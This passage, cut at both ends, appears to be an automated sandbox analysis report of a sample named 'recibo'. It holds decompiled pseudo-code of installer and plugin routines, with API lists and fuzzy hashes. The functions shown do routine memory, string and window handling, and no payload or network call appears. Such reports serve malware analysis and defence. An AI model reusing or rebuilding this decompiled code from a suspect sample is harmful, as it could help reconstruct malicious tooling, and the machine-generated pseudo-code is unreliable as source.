                                                                                  									__edi[1] = __edx;
                                                                                  									goto L27;
                                                                                  								case 3:
                                                                                  									__eax = GlobalAlloc(0x40,  *0x7154506c);
                                                                                  									 *(__esi + 0x1c) = __eax;
                                                                                  									__edx = 0;
                                                                                  									 *__edi = __eax;
                                                                                  									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7154506c, __eax,  *0x7154506c, 0, 0);
                                                                                  									goto L27;
                                                                                  								case 4:
                                                                                  									__eax = E715412CC(__ebp);
                                                                                  									 *(__esi + 0x1c) = __eax;
                                                                                  									L21:
                                                                                  									 *__edi = __eax;
                                                                                  									goto L27;
                                                                                  								case 5:
                                                                                  									__eax = GlobalAlloc(0x40, 0x10);
                                                                                  									_push(__eax);
                                                                                  									 *(__esi + 0x1c) = __eax;
                                                                                  									_push(__ebp);
                                                                                  									 *__edi = __eax;
                                                                                  									__imp__CLSIDFromString();
                                                                                  									goto L27;
                                                                                  								case 6:
                                                                                  									if( *__ebp != __cx) {
                                                                                  										__eax = E715413B1(__ebp);
                                                                                  										 *__ebx = __eax;
                                                                                  									}
                                                                                  									goto L27;
                                                                                  								case 7:
                                                                                  									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                  									( *(__esi + 0x18) - 1) *  *0x7154506c =  *0x71545074 + ( *(__esi + 0x18) - 1) *  *0x7154506c * 2 + 0x18;
                                                                                  									 *__ebx =  *0x71545074 + ( *(__esi + 0x18) - 1) *  *0x7154506c * 2 + 0x18;
                                                                                  									asm("cdq");
                                                                                  									__eax = E71541510(__edx,  *0x71545074 + ( *(__esi + 0x18) - 1) *  *0x7154506c * 2 + 0x18, __edx,  *0x71545074 + ( *(__esi + 0x18) - 1) *  *0x7154506c * 2);
                                                                                  									goto L27;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					L9:
                                                                                  					_t37 = E715412CC(0x71545044);
                                                                                  					goto L10;
                                                                                  				}
                                                                                  			}











                                                                                  0x00000000
                                                                                  0x71542530
                                                                                  0x71542535
                                                                                  0x71542538
                                                                                  0x71542539
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154256f
                                                                                  0x71542575
                                                                                  0x71542576
                                                                                  0x71542579
                                                                                  0x7154257a
                                                                                  0x7154257c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542588
                                                                                  0x7154258b
                                                                                  0x71542597
                                                                                  0x71542599
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715425a5
                                                                                  0x715425b1
                                                                                  0x715425b4
                                                                                  0x715425b6
                                                                                  0x715425b9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542508
                                                                                  0x71542502
                                                                                  0x715424db
                                                                                  0x715424e0
                                                                                  0x00000000
                                                                                  0x715424e0

                                                                                  APIs
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 715425C2
                                                                                    • Part of subcall function 715412CC: lstrcpynW.KERNEL32(00000000,?,7154137F,00000019,715411CA,-000000A0), ref: 715412DC
                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 71542548
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 71542563
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                  • String ID:
                                                                                  • API String ID: 4216380887-0
                                                                                  • Opcode ID: c4998b10af3c2448bd445dd3baf2afc259f7bc675199cd943023683103837e38
                                                                                  • Instruction ID: b20ffbe2f239aca6e48792ac5a9b99179497ff127cb42ad73ebc0f4f0c114fbb
                                                                                  • Opcode Fuzzy Hash: c4998b10af3c2448bd445dd3baf2afc259f7bc675199cd943023683103837e38
                                                                                  • Instruction Fuzzy Hash: 7341C2B1008316DFD71DEF26E884A6A77F8FB84310F21591EED5B8B585E730A548CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 77%
                                                                                  			E00401D81(void* __ebx, void* __edx) {
                                                                                  				struct HWND__* _t30;
                                                                                  				WCHAR* _t38;
                                                                                  				void* _t48;
                                                                                  				void* _t53;
                                                                                  				signed int _t55;
                                                                                  				signed int _t60;
                                                                                  				long _t63;
                                                                                  				void* _t65;
                                                                                  
                                                                                  				_t53 = __ebx;
                                                                                  				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                                  					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                                  				} else {
                                                                                  					E00402D84(2);
                                                                                  					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                                  				}
                                                                                  				_t55 =  *(_t65 - 0x24);
                                                                                  				 *(_t65 + 8) = _t30;
                                                                                  				_t60 = _t55 & 0x00000004;
                                                                                  				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                                  				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                                  				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                                  				if((_t55 & 0x00010000) == 0) {
                                                                                  					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                                  				} else {
                                                                                  					_t38 = E00402DA6(0x11);
                                                                                  				}
                                                                                  				 *(_t65 - 0x44) = _t38;
                                                                                  				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                                  				asm("sbb esi, esi");
                                                                                  				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                                  				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                  				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                  					DeleteObject(_t48);
                                                                                  				}
                                                                                  				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                  					_push(_t63);
                                                                                  					E00406484();
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                                                  				return 0;
                                                                                  			}












                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                  • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                  • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                  • String ID:
                                                                                  • API String ID: 1849352358-0
                                                                                  • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                  • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                  • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                  • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E715416BD(struct HINSTANCE__* _a4, short* _a8) {
                                                                                  				_Unknown_base(*)()* _t7;
                                                                                  				void* _t10;
                                                                                  				int _t14;
                                                                                  
                                                                                  				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                  				_t10 = GlobalAlloc(0x40, _t14);
                                                                                  				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                  				_t7 = GetProcAddress(_a4, _t10);
                                                                                  				GlobalFree(_t10);
                                                                                  				return _t7;
                                                                                  			}







                                                                                  APIs
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,715422D8,?,00000808), ref: 715416D5
                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,715422D8,?,00000808), ref: 715416DC
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,715422D8,?,00000808), ref: 715416F0
                                                                                  • GetProcAddress.KERNEL32(715422D8,00000000), ref: 715416F7
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 71541700
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                  • String ID:
                                                                                  • API String ID: 1148316912-0
                                                                                  • Opcode ID: 3eda2260acc158675a4d60b881341d3982ae106a4d15d9e7acb20dfb177b08cd
                                                                                  • Instruction ID: 3ce8efe4ae49663dd8f89606855c650b8aa8affde8499ca3087e50b62f5c2e47
                                                                                  • Opcode Fuzzy Hash: 3eda2260acc158675a4d60b881341d3982ae106a4d15d9e7acb20dfb177b08cd
                                                                                  • Instruction Fuzzy Hash: E0F0127314A1387BD62016A78C4CD9B7E9CDF8B2F5B120211F62C9119086725C11D7F1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 59%
                                                                                  			E00401C43(intOrPtr __edx) {
                                                                                  				int _t29;
                                                                                  				long _t30;
                                                                                  				signed int _t32;
                                                                                  				WCHAR* _t35;
                                                                                  				long _t36;
                                                                                  				int _t41;
                                                                                  				signed int _t42;
                                                                                  				int _t46;
                                                                                  				int _t56;
                                                                                  				intOrPtr _t57;
                                                                                  				struct HWND__* _t63;
                                                                                  				void* _t64;
                                                                                  
                                                                                  				_t57 = __edx;
                                                                                  				_t29 = E00402D84(3);
                                                                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                  				 *(_t64 - 0x18) = _t29;
                                                                                  				_t30 = E00402D84(4);
                                                                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                  				 *(_t64 + 8) = _t30;
                                                                                  				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                                  					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                                  				}
                                                                                  				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                                  				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                                  					 *(_t64 + 8) = E00402DA6(0x44);
                                                                                  				}
                                                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                                  				_push(1);
                                                                                  				if(__eflags != 0) {
                                                                                  					_t61 = E00402DA6();
                                                                                  					_t32 = E00402DA6();
                                                                                  					asm("sbb ecx, ecx");
                                                                                  					asm("sbb eax, eax");
                                                                                  					_t35 =  ~( *_t31) & _t61;
                                                                                  					__eflags = _t35;
                                                                                  					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                  					goto L10;
                                                                                  				} else {
                                                                                  					_t63 = E00402D84();
                                                                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                  					_t41 = E00402D84(2);
                                                                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                  					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                  					if(__eflags == 0) {
                                                                                  						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                  						L10:
                                                                                  						 *(_t64 - 0x38) = _t36;
                                                                                  					} else {
                                                                                  						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                  						asm("sbb eax, eax");
                                                                                  						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                  					}
                                                                                  				}
                                                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                  				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                  					_push( *(_t64 - 0x38));
                                                                                  					E00406484();
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                                                  				return 0;
                                                                                  			}

                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Timeout
                                                                                  • String ID: !
                                                                                  • API String ID: 1777923405-2657877971
                                                                                  • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                  • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                  • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                  • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 77%
                                                                                  			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                  				char _v68;
                                                                                  				char _v132;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				signed int _t23;
                                                                                  				signed int _t24;
                                                                                  				void* _t31;
                                                                                  				void* _t33;
                                                                                  				void* _t34;
                                                                                  				void* _t44;
                                                                                  				signed int _t46;
                                                                                  				signed int _t50;
                                                                                  				signed int _t52;
                                                                                  				signed int _t53;
                                                                                  				signed int _t55;
                                                                                  
                                                                                  				_t23 = _a16;
                                                                                  				_t53 = _a12;
                                                                                  				_t44 = 0xffffffdc;
                                                                                  				if(_t23 == 0) {
                                                                                  					_push(0x14);
                                                                                  					_pop(0);
                                                                                  					_t24 = _t53;
                                                                                  					if(_t53 < 0x100000) {
                                                                                  						_push(0xa);
                                                                                  						_pop(0);
                                                                                  						_t44 = 0xffffffdd;
                                                                                  					}
                                                                                  					if(_t53 < 0x400) {
                                                                                  						_t44 = 0xffffffde;
                                                                                  					}
                                                                                  					if(_t53 < 0xffff3333) {
                                                                                  						_t52 = 0x14;
                                                                                  						asm("cdq");
                                                                                  						_t24 = 1 / _t52 + _t53;
                                                                                  					}
                                                                                  					_t25 = _t24 & 0x00ffffff;
                                                                                  					_t55 = _t24 >> 0;
                                                                                  					_t46 = 0xa;
                                                                                  					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                  				} else {
                                                                                  					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                  					_t50 = 0;
                                                                                  				}
                                                                                  				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                  				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                                                  				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                                                  				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                  				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                                                  			}

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                  • wsprintfW.USER32 ref: 00404DF0
                                                                                  • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                  • String ID: %u.%u%s%s
                                                                                  • API String ID: 3540041739-3551169577
                                                                                  • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                  • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                  • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                  • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 53%
                                                                                  			E00405F14(void* __eflags, intOrPtr _a4) {
                                                                                  				int _t11;
                                                                                  				signed char* _t12;
                                                                                  				intOrPtr _t18;
                                                                                  				intOrPtr* _t21;
                                                                                  				signed int _t23;
                                                                                  
                                                                                  				E0040653D(0x42fa70, _a4);
                                                                                  				_t21 = E00405EB7(0x42fa70);
                                                                                  				if(_t21 != 0) {
                                                                                  					E004067C4(_t21);
                                                                                  					if(( *0x434f18 & 0x00000080) == 0) {
                                                                                  						L5:
                                                                                  						_t23 = _t21 - 0x42fa70 >> 1;
                                                                                  						while(1) {
                                                                                  							_t11 = lstrlenW(0x42fa70);
                                                                                  							_push(0x42fa70);
                                                                                  							if(_t11 <= _t23) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t12 = E00406873();
                                                                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                  								E00405E58(0x42fa70);
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								goto L1;
                                                                                  							}
                                                                                  						}
                                                                                  						E00405E0C();
                                                                                  						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                                  					}
                                                                                  					_t18 =  *_t21;
                                                                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                  						goto L1;
                                                                                  					} else {
                                                                                  						goto L5;
                                                                                  					}
                                                                                  				}
                                                                                  				L1:
                                                                                  				return 0;
                                                                                  			}

                                                                                  APIs
                                                                                    • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 44w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                  • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 44w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                  • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 44w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77343420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                  • String ID: 44w$C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 3248276644-513344976
                                                                                  • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                  • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                  • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                  • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E00405E0C(WCHAR* _a4) {
                                                                                  				WCHAR* _t9;
                                                                                  
                                                                                  				_t9 = _a4;
                                                                                  				_push( &(_t9[lstrlenW(_t9)]));
                                                                                  				_push(_t9);
                                                                                  				if( *(CharPrevW()) != 0x5c) {
                                                                                  					lstrcatW(_t9, 0x40a014);
                                                                                  				}
                                                                                  				return _t9;
                                                                                  			}





                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 2659869361-3355392842
                                                                                  • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                  • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                  • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                  • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E715410E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                                                  				void* _v0;
                                                                                  				void* _t27;
                                                                                  				signed int _t29;
                                                                                  				void* _t30;
                                                                                  				void* _t34;
                                                                                  				void* _t36;
                                                                                  				void* _t38;
                                                                                  				void* _t40;
                                                                                  				void* _t48;
                                                                                  				void* _t54;
                                                                                  				void* _t63;
                                                                                  				void* _t64;
                                                                                  				signed int _t66;
                                                                                  				void* _t67;
                                                                                  				void* _t73;
                                                                                  				void* _t74;
                                                                                  				void* _t77;
                                                                                  				void* _t80;
                                                                                  				void _t81;
                                                                                  				void _t82;
                                                                                  				intOrPtr _t84;
                                                                                  				void* _t86;
                                                                                  				void* _t88;
                                                                                  
                                                                                  				 *0x7154506c = _a8;
                                                                                  				 *0x71545070 = _a16;
                                                                                  				 *0x71545074 = _a12;
                                                                                  				_a12( *0x71545048, E71541651, _t73);
                                                                                  				_t66 =  *0x7154506c +  *0x7154506c * 4 << 3;
                                                                                  				_t27 = E715412E3();
                                                                                  				_v0 = _t27;
                                                                                  				_t74 = _t27;
                                                                                  				if( *_t27 == 0) {
                                                                                  					L28:
                                                                                  					return GlobalFree(_t27);
                                                                                  				}
                                                                                  				do {
